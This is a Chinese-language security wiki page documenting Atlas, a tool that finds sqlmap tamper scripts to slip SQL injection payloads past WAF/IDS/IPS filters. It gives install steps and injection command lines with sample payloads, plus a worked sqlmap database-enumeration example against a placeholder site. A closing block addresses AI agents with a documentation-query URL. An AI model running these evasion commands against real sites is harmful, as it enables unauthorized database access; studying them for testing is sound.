# Atlas修改SQLMap tampers 绕过WAF/IDS/IPS **Atlas**是一个开源工具,可以修改sqlmap tampers 绕过WAF / IDS / IPS,该工具基于返回的状态码。 ### Atlas安装 ``` git clone https://github.com/m4ll0k/Atlas.git atlas cd atlas python atlas.py # python3+ ``` ![](/files/-MDsmntCw5U86YoawApf) ![](/files/-MDsmntGFHJWe46HyRQf) ### 使用 ``` python atlas.py --url http://site.com/index.php?id=Price_ASC --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v ``` **注入点(带`%%inject%%`):** #### get: ``` python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v ``` #### post: ``` python atlas.py --url http://site.com/index/id/ -m POST -D 'test=%%10%%' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v ``` #### headers: ``` python atlas.py --url http://site.com/index/id/ -H 'User-Agent: mozilla/5.0%%inject%%' -H 'X-header: test' --payload="-1234 AND 4321=4321-- AAAA" --random-agent -v ``` #### 连接tampers: ``` python atlas.py --url http://site.com/index/id/%%10%% --payload="-1234 AND 4321=4321-- AAAA" --concat "equaltolike,htmlencode" --random-agent -v ``` 获取tampers列表: ``` python atlas.py -g ``` ### 例 1. 运行SQLMap: ``` python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 ``` ![](/files/-MDsmntHbFstH5uU8u-g) `Price_ASC') AND 8716=4837 AND ('yajr'='yajr` 被WAF / IDS / IPS阻止,现在尝试使用Atlas: ``` python atlas.py --url 'http://site.com/index.php?id=Price_ASC' --payload="') AND 8716=4837 AND ('yajr'='yajr" --random-agent -v ``` ![](/files/-MDsmntIJmE9bB3qc4KE) 在此刻: ``` python sqlmap.py -u 'http://site.com/index.php?id=Price_ASC' --dbs --random-agent -v 3 --tamper=versionedkeywords,... ``` ### 项目地址 GitHub --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://xu-an.gitbook.io/sec/how/sqlmap/atlas.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.